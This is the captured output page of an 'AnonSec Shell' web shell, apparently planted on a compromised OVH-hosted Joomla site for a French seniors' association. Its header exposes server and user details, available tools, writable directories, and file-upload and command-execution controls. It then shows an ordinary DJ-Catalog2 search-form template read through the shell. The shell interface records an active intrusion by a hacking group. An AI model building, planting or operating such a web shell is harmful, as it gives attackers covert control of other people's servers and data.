AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.112
Web Server : Apache
System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : coopiak ( 151928)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/coopiak/amisdesseniors-fr/lyon/modules/mod_djc2search/tmpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/coopiak/amisdesseniors-fr/lyon/modules/mod_djc2search/tmpl/default.php
<?php
/**
 * @package DJ-Catalog2
 * @copyright Copyright (C) DJ-Extensions.com, All rights reserved.
 * @license http://www.gnu.org/licenses GNU/GPL
 * @author url: http://dj-extensions.com
 * @author email contact@dj-extensions.com
 */

defined ('_JEXEC') or die('Restricted access');

?>

<form action="<?php echo JRoute::_('index.php?option=com_djcatalog2&task=search'); ?>" method="post" name="DJC2searchForm_<?php echo $module->id; ?>" id="DJC2searchForm_<?php echo $module->id; ?>" >
	<fieldset class="djc_mod_search djc_clearfix">
		<div class="input-group">
			<?php if ($params->get('show_label', 1) == 1) { ?>
				<label for="mod_djcatsearch_<?php echo $module->id; ?>"><?php echo JText::_('MOD_DJC2SEARCH_SEARCH'); ?></label>
			<?php } ?>
			<input type="text" aria-label="Search value" class="input form-control" name="search" id="mod_djcatsearch_<?php echo $module->id; ?>" value="" <?php if ($params->get('show_label', 1) == 0) echo 'placeholder="'.JText::_('MOD_DJC2SEARCH_SEARCH').'" ';?> />
			<?php if ($params->get('show_button', 1) == 1) { ?>
				<button role="button" class="btn btn-primary" onclick="document.DJC2searchForm_<?php echo $module->id; ?>.submit();"><?php echo JText::_( 'MOD_DJC2SEARCH_GO' ); ?></button>
			<?php } ?>
		</div>
	</fieldset>
    
	<input type="hidden" name="option" value="com_djcatalog2" />
	<input type="hidden" name="view" value="items" />
	<input type="hidden" name="cid" value="<?php echo $cid; ?>" />
	<input type="hidden" name="task" value="search" />
	<input type="submit" style="display: none;"/>
</form>

Anon7 - 2022
AnonSec Team